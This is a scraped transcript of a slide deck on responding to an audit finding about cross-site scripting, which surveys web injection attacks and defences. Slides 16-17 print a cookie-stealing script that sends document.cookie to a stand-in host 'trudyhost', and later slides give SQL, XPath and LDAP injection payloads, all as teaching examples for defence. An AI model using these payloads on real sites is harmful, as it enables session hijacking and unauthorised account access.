Presentation is loading. Please wait.

Presentation is loading. Please wait.

Web Audit Vulnerability cross-site scripting (XSS) concerns by Ron Widitz.

Published by Modified over 9 years ago

Similar presentations

Presentation on theme: "Web Audit Vulnerability cross-site scripting (XSS) concerns by Ron Widitz."— Presentation transcript:

1 Web Audit Vulnerability cross-site scripting (XSS) concerns by Ron Widitz

2 Business Problem Independent security audit Independent security audit Regulatory compliance Regulatory compliance XSS issue raised XSS issue raised Must provide a response Must provide a response

3 Audit Response Either: Either: –Prove issue to be a non-problem or –Describe actions to take

4

5 Resolution Steps Investigate security concerns Investigate security concerns Restate as IT problem(s) Restate as IT problem(s) Determine solution(s) Determine solution(s) Provide audit response Provide audit response Mitigate risk Mitigate risk

6 Investigation Define cross-site scripting (XSS) Define cross-site scripting (XSS) Examine how auditors applied Examine how auditors applied Identify risks Identify risks Research preliminary solutions Research preliminary solutions

7 cross-site scripting Attacker goal: their code into browser Attacker goal: their code into browser XSS forces a website to execute malicious code in browser XSS forces a website to execute malicious code in browser Browser user is the intended victim Browser user is the intended victim Why? Account hijacking, keystroke recording, intranet hacking, theft… Why? Account hijacking, keystroke recording, intranet hacking, theft…

8 XSS concept

9 Auditor finding Freeform edit box Freeform edit box Message to Customer Service Message to Customer Service

10 XSS types Immediate reflection : phishing Immediate reflection : phishing DOM-based : 95 JavaScript methods DOM-based : 95 JavaScript methods Redirection : header, meta, dynamic Redirection : header, meta, dynamic Multimedia : Flash, QT, PDF scripts Multimedia : Flash, QT, PDF scripts Cross-Site Request Forgery (CSRF) Cross-Site Request Forgery (CSRF) others… others… –(e.g. non-persistent search box)

11 Risks XSS abuses render engines or plug-ins XSS abuses render engines or plug-ins Steal browser cookies Steal browser cookies Steal session info for replay attack Steal session info for replay attack Malware or bot installation Malware or bot installation Redirect or phishing attempt Redirect or phishing attempt

12 Our actual risk Currently, none. Currently, none. Edit box info viewed in thick client Edit box info viewed in thick client DHTML or JavaScript needs browser DHTML or JavaScript needs browser Our thick client is Java Swing-based Our thick client is Java Swing-based

13 Planned Audit Response Could indicate “no audit problem” Could indicate “no audit problem” Might have future impact Might have future impact Address through dev standards Address through dev standards Consider application firewall Consider application firewall Widen problem scope to include all user agent injection tactics Widen problem scope to include all user agent injection tactics

14 More on Web Attacks Cross Site Scripting Cross Site Scripting SQL Injection SQL Injection XPATH Injection XPATH Injection LDAP Injection LDAP Injection SSI (server side inclusion) Injection SSI (server side inclusion) Injection JSP (Java server pages) Injection JSP (Java server pages) Injection

15 Artifacts For each injection issue: For each injection issue: –Vulnerability description documented –Preventative coding technique Discuss with App Dev teams Discuss with App Dev teams –Publish and socialize direction –Include in peer reviews/code walkthroughs –Set deadlines for full incorporation Communicate with auditors Communicate with auditors

16 Cross Site Scripting Example 1 Trudy posts the following JavaScript on a message board: Trudy posts the following JavaScript on a message board: document.location='http://trudyhost/cgi- bin/ stealcookie.cgi?'+document.cookie document.location='http://trudyhost/cgi- bin/ stealcookie.cgi?'+document.cookie When Bob views the posted message, his browser executes the malicious script, and his session cookie is sent to Trudy When Bob views the posted message, his browser executes the malicious script, and his session cookie is sent to Trudy

17 Cross Site Scripting Example 2 Trudy sends a link to the following URL to Bob that will take him to a personalized page: Trudy sends a link to the following URL to Bob that will take him to a personalized page: http://host/personalizedpage.php?username= document.location='http://trudyhost/cgi- bin/stealcookie.cgi?'+document.cookie http://host/personalizedpage.php?username= document.location='http://trudyhost/cgi- bin/stealcookie.cgi?'+document.cookie A page is returned that contains the malicious script instead of the username Bob, and Bob’s browser executes the script causing his session cookie to be sent to Trudy A page is returned that contains the malicious script instead of the username Bob, and Bob’s browser executes the script causing his session cookie to be sent to Trudy Hex is often used in place of ASCII for the JavaScript to make the URL less suspicious Hex is often used in place of ASCII for the JavaScript to make the URL less suspicious

18 Cross Site Scripting Detection A client usually is not supposed to send scripts to servers A client usually is not supposed to send scripts to servers –If the server receives … or the hex equivalent in an incoming packet and that same script is sent unsanitized in an outgoing packet or in an outgoing SQL statement to the database, then an attack has occurred A sanitized script could look like &ls;SCRIPT>… A sanitized script could look like &ls;SCRIPT>…

19 SQL Injection Example Trudy accesses Bob’s website; in which he does not validate input on his sign in form Trudy accesses Bob’s website; in which he does not validate input on his sign in form –Runs a SQL statement like the following: –SELECT * from Accounts where username = “USER_NAME” and password = “USER_PASS”; In the password field, she types as her password: In the password field, she types as her password: –X” OR “x”=“x Manipulates the server into running the following SQL command: Manipulates the server into running the following SQL command: –SELECT * from Accounts where username = “USER_NAME” and password=“X” OR “x”=“x”; –Selects all account information

20 SQL Injection Detection To detect and prevent this at Bob’s location To detect and prevent this at Bob’s location –Log any traffic from Trudy to Bob containing form data containing a quotation mark –Match any outgoing SQL statements from Bob’s web server to his database server and verify that the quotation marks Trudy supplied were escaped –If they weren’t, take action

21 XPATH Injection Example Similar to SQL injection Similar to SQL injection Bob has a form that does not sanitize user- provided input before using it as part of an XPATH query:: Bob has a form that does not sanitize user- provided input before using it as part of an XPATH query:: –string(//user[name/text()=’USER_NAME' and password/text()=’USER_PASS']/account/text()) Trudy again can provide the following password to change the statement’s logic: Trudy again can provide the following password to change the statement’s logic: –X’ OR ‘x’=‘x –The statement thus selects the first account

22 LDAP Injection Example Server using LDAP for authentication Server using LDAP for authentication –User name initialized, but then uses unchecked user input to create a query filter = "(uid=" + CStr(userName) + ")" ' searching for the user entry Attacker can exploit using special characters Attacker can exploit using special charactershttp://example/ldapsearch.asp?user=*

23 LDAP Injection Detection Detection is based off of usage of special LDAP characters Detection is based off of usage of special LDAP characters –System monitors input for special characters –Either scrubs incoming input or watches for unescaped output passed to database server Detection approach is blackbox Detection approach is blackbox

24 SSI Injection Example Bob has his server configured to use Server- Side Includes Bob has his server configured to use Server- Side Includes Trudy passes input with an SSI embedded Trudy passes input with an SSI embedded SSI inserts malicious code into normal webpages upon next request SSI inserts malicious code into normal webpages upon next request Future legitimate users get content containing the tainted code included by the SSI Future legitimate users get content containing the tainted code included by the SSI

25 SSI Injection Detection Bob’s system needs SSI enabled, so he uses our system on local servers Bob’s system needs SSI enabled, so he uses our system on local servers –SSI code can be detected by its specific format HTML comment ( ) containing a command HTML comment ( ) containing a command –SSI commands can be stripped on ingress –Can also deny outgoing packets that do not include SSI as inputted (means successful execution) Detection approach is blackbox Detection approach is blackbox

26 JSP Injection Example Similar to SSI injection Similar to SSI injection Bob has a portal server configured to use dynamic code for templates Bob has a portal server configured to use dynamic code for templates Trudy passes input with an embedded Trudy passes input with an embedded malicious code inserted into webpage malicious code inserted into webpage

27 JSP Injection Prevention Prefer static include Prefer static include Don’t allow file inclusion outside of server via Java2 Security policies Don’t allow file inclusion outside of server via Java2 Security policies Firewall rules to prevent outbound requests from server Firewall rules to prevent outbound requests from server Input validation coding Input validation coding Choose portal software not requiring dynamic includes or code execution Choose portal software not requiring dynamic includes or code execution

28 Defense Approaches Web firewall/IDS Web firewall/IDS –ModSecurity for Apache –Commercial: SecureSphere from Impervia Static code analysis Static code analysis –Open source: Nikto –Commercial: Acutenix Web Vulnerability Scanner Acutenix Web Vulnerability Scanner N-stalker N-stalker Education on good coding Education on good coding –HTML encoding on input (server-side) –Input validation/filtering

29 Q&A Suggestions? Suggestions?

30

31 Backup Slides

32 user agent injection Stored Stored HTTP Response Splitting HTTP Response Splitting SQL Injection SQL Injection XML Injection XML Injection JSP Code Injection JSP Code Injection LDAP Injection LDAP Injection

33 Approaches Application firewall Application firewall HTML encoding on input (server-side) HTML encoding on input (server-side) Input validation/filtering Input validation/filtering Coding techniques with output Coding techniques with output Session key enforced to prevent CSRF Session key enforced to prevent CSRF

34 XPATH Injection Detection Again, our system can detect this by matching any submission by Trudy containing a quotation mark against outbound XPATH queries Again, our system can detect this by matching any submission by Trudy containing a quotation mark against outbound XPATH queries Correction can again be done by escaping any rogue quotation marks Trudy may have inserted Correction can again be done by escaping any rogue quotation marks Trudy may have inserted Detection approach is blackbox Detection approach is blackbox

Download ppt "Web Audit Vulnerability cross-site scripting (XSS) concerns by Ron Widitz."

Similar presentations

Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems © 2002, Predictive Systems.

Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems © 2002, Predictive Systems.
Nick Feamster CS 6262 Spring 2009

Nick Feamster CS 6262 Spring 2009
What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.

What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.
HI-TEC 2011 SQL Injection. Client’s Browser HTTP or HTTPS Web Server Apache or IIS HTML Forms CGI Scripts Database SQL Server or Oracle or MySQL ODBC.

HI-TEC 2011 SQL Injection. Client’s Browser HTTP or HTTPS Web Server Apache or IIS HTML Forms CGI Scripts Database SQL Server or Oracle or MySQL ODBC.
Hands-on SQL Injection Attack and Defense HI-TEC July 21, 2013.

Hands-on SQL Injection Attack and Defense HI-TEC July 21, 2013.
©2009 Justin C. Klein Keane PHP Code Auditing Session 5 XSS & XSRF Justin C. Klein Keane

©2009 Justin C. Klein Keane PHP Code Auditing Session 5 XSS & XSRF Justin C. Klein Keane
WebGoat & WebScarab “What is computer security for $1000 Alex?”

WebGoat & WebScarab “What is computer security for $1000 Alex?”
EECS 354 Network Security Cross Site Scripting (XSS)

EECS 354 Network Security Cross Site Scripting (XSS)
Financial Industry Security by Ron Widitz, MSIT ‘07.

Financial Industry Security by Ron Widitz, MSIT ‘07.
By Brian Vees.  SQL Injection  Username Enumeration  Cross Site Scripting (XSS)  Remote Code Execution  String Formatting Vulnerabilities.

By Brian Vees.  SQL Injection  Username Enumeration  Cross Site Scripting (XSS)  Remote Code Execution  String Formatting Vulnerabilities.
It’s always better live. MSDN Events Security Best Practices Part 2 of 2 Reducing Vulnerabilities using Visual Studio 2008.

It’s always better live. MSDN Events Security Best Practices Part 2 of 2 Reducing Vulnerabilities using Visual Studio 2008.
Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.

Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.
It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.

It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.
Introduction to Web Application Security

Introduction to Web Application Security
Web Security. Objectives Understand the complexity of Web infrastructure and current trends of Web threat Understand the complexity of Web infrastructure.

Web Security. Objectives Understand the complexity of Web infrastructure and current trends of Web threat Understand the complexity of Web infrastructure.
Introduction to the OWASP Top 10. Cross Site Scripting (XSS)  Comes in several flavors:  Stored  Reflective  DOM-Based.

Introduction to the OWASP Top 10. Cross Site Scripting (XSS)  Comes in several flavors:  Stored  Reflective  DOM-Based.
Web Security. Why Web Security: a Real Business Problem > 60% of total attack attempts observed on the Net are against Web applications > 60% of total.

Web Security. Why Web Security: a Real Business Problem > 60% of total attack attempts observed on the Net are against Web applications > 60% of total.
Web Security. Objectives Understand the complexity of Web infrastructure and current trends of Web threat Understand the complexity of Web infrastructure.

Web Security. Objectives Understand the complexity of Web infrastructure and current trends of Web threat Understand the complexity of Web infrastructure.
CROSS SITE SCRIPTING..! (XSS). Overview What is XSS? Types of XSS Real world Example Impact of XSS How to protect against XSS?

CROSS SITE SCRIPTING..! (XSS). Overview What is XSS? Types of XSS Real world Example Impact of XSS How to protect against XSS?
Leveraging User Interactions for In-Depth Testing of Web Application Sean McAllister Secure System Lab, Technical University Vienna, Austria Engin Kirda.

Leveraging User Interactions for In-Depth Testing of Web Application Sean McAllister Secure System Lab, Technical University Vienna, Austria Engin Kirda.

Similar presentations

Ads by Google